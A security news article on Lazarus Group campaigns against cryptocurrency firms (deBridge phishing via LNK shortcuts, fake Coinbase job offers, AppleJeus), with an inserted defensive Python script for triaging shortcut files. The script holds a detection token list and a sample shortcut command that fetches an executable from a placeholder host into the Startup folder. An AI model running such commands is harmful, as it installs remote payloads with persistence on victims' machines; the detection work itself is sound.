The North Korean state-sponsored threat actor Lazarus has long brought the definitions used by security researchers into doubt. Typically, state-sponsored groups are not financially motivated but motivated by the policies and aims of their state overlords.
Lazarus is both, in the sense that it not only conducts cyber espionage campaigns to further North Korea’s geopolitical ambitions but also carries out financially motivated attacks such as ransomware, attacks on banks, and attempts to steal cryptocurrency.
Campaigns to steal cryptocurrency appear to have ramped up in the last few months, and two separate events in particular show that Lazarus is hard at work trying to steal your crypto.
The first involves Lazarus hackers attempting to compromise the deBridge platform. deBridge Finance operates a cross-chain protocol that enables the decentralized transfer of assets between various blockchains.
Lazarus sent specially crafted spam emails to deBridge employees designed to trick them into downloading malware.
The malware in question would attempt to harvest information from Windows machines and lay the groundwork for the delivery of future malicious payloads. The email was crafted to appear to come from company co-founder Alex Smirnov, allegedly sharing new information about salary changes, in an attempt to trick employees.
Interestingly, the email contains an HTML file, purporting to be the salary changes applicable to employees, and another file labeled “password.txt”.
The latter is in fact an LNK file. As covered in a previous article published on this platform, threat actors have increasingly been using LNK files as an attack vector following Microsoft severely limiting macros by default.
The intended attack chain begins with the unsuspecting employee clicking the HTML file which is masquerading as a PDF. Then the employee would be presented with a password-protected cloud archive prompting them to open the malicious LNK file.
If the LNK is opened, it runs a Command Prompt command that fetches the malicious payload. The payload is then saved in the machine's Startup folder in an attempt to ensure persistence on the now infected machine.
The malware will also check if security solutions from ESET, Tencent, and Bitdefender are installed.
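The attack chain above turns on a shortcut file whose target launches the Command Prompt to fetch a payload. As an added example (not code from the article or from any of the researchers it cites), the following Python triage script parses the string fields of a Windows shell link and flags the indicators a defender would look for; the shortcut bytes it inspects are constructed in the script itself, and the domain and paths in them are placeholders.

```python
import struct

# Shell link header constants from the MS-SHLLINK specification.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x08, 0x10, 0x20, 0x40, 0x80
# StringData fields appear in this fixed order when their flag is set.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relpath"), (HAS_WORK_DIR, "workdir"),
                 (HAS_ARGS, "args"), (HAS_ICON, "icon"))
# Heuristic tokens: shell interpreters, remote fetches and the Startup folder.
SUSPICIOUS = ("cmd.exe", "powershell", "http://", "https://", "curl ", "certutil", "bitsadmin", "startup")

def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (name, relpath, workdir, args, icon) of a .lnk."""
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link file")
    pos = 0x4C
    if flags & HAS_ID_LIST:                      # IDListSize excludes its own 2 bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[key] = data[pos:pos + count].decode("cp1252")
            pos += count
    return fields

def suspicious_indicators(fields: dict) -> list:
    """List the heuristic tokens found in the shortcut's target, arguments or workdir."""
    target = " ".join(fields.get(k, "") for k in ("relpath", "args", "workdir")).lower()
    return [tok for tok in SUSPICIOUS if tok in target]

def build_sample_lnk(relpath: str, args: str) -> bytes:
    """Constructed test shortcut: 76-byte header plus Unicode RelativePath and Arguments."""
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, HAS_REL_PATH | HAS_ARGS | IS_UNICODE)
    header += bytes(0x4C - len(header))         # zero the remaining header fields
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (relpath, args))
    return header + body

if __name__ == "__main__":
    # Constructed sample mimicking the described chain; example.invalid is a placeholder.
    lnk = build_sample_lnk(r"..\Windows\System32\cmd.exe",
                           r"/c curl http://example.invalid/u.exe -o %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\u.exe")
    print(suspicious_indicators(parse_lnk(lnk)))  # ['cmd.exe', 'http://', 'curl ', 'startup']
```

Real shortcuts usually also carry a LinkTargetIDList and LinkInfo block; the parser skips both so the same string fields are read from them.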
Lazarus has been determined to be the threat actor in this case based on the overlap in file names and infrastructure with a previous attack attributed to the group. One such campaign in which this overlap occurred was CryptoCore, with researchers from ClearSky noting,
“We adopted F-SECURE’s attribution to LAZARUS. Then we reaffirmed this attribution by comparing the attack tools found in this campaign to other Lazarus campaigns and found strong similarities.”
Fake Coinbase Job Offers
In a separate attack campaign, Lazarus threat actors have been seen targeting employees in the Fintech industry with fake job offers from Coinbase.
The campaign was discovered by Malwarebytes researcher Hossein Jazi, who has paid particular attention to recent Lazarus activity. Jazi noted that the campaign is targeting candidates suitable for the role of “Engineering Manager, Product Security.”
Given that Coinbase is one of the cryptocurrency industry's most successful organizations, the threat actors are dangling a rather enticing carrot in front of potential job seekers. Bleeping Computer noted,
“When victims download what they believe to be a PDF about the job position, they are actually getting a malicious executable using a PDF icon. In this case, the file is named "Coinbase_online_careers_2022_07.exe," which will display the decoy PDF document shown below when executed while also loading a malicious DLL.”
In a departure from the tactics of the first campaign covered in this article, once executed the malware uses GitHub as a command-and-control server from which it receives the commands to run on the infected device.
The use of fake job offers is not without precedent in Lazarus’ dubious past. Fake job offers purporting to be from Lockheed Martin and General Dynamics have previously been used to trick victims into installing malware.
So far in 2022, Lazarus has shifted much of its attention to cryptocurrency targets, whether cross-chain bridges, exchanges, or even NFT marketplaces.
North Korea is heavily sanctioned with only Russia and China as trading partners, and even then the trade volumes can be seen as fairly negligible in a global context.
This has meant that the country's ruling regime is forced to get creative in how it funds its missile and nuclear weapons projects. In the past, Lazarus has been seen stealing billions of dollars from third-world banks; now it appears anything crypto-related is considered a legitimate target.
This has even resulted in the development of malicious cryptocurrency applications like wallets that will steal users' cryptocurrency, as the US warned,
“The U.S. government has identified a group of North Korean state-sponsored malicious cyber actors using tactics similar to the previously identified Lazarus Group (see AppleJeus: Analysis of North Korea’s Cryptocurrency Malware). The Lazarus Group used AppleJeus to trojanize cryptocurrency applications targeting individuals and companies—including cryptocurrency exchanges and financial services companies—through the dissemination of cryptocurrency trading applications that were modified to include malware that facilitates theft of cryptocurrency. As of April 2022, North Korea’s Lazarus Group actors have targeted various firms, entities, and exchanges in the blockchain and cryptocurrency industry using spearphishing campaigns and malware to steal cryptocurrency. These actors will likely continue exploiting vulnerabilities of cryptocurrency technology firms, gaming companies, and exchanges to generate and launder funds to support the North Korean regime.”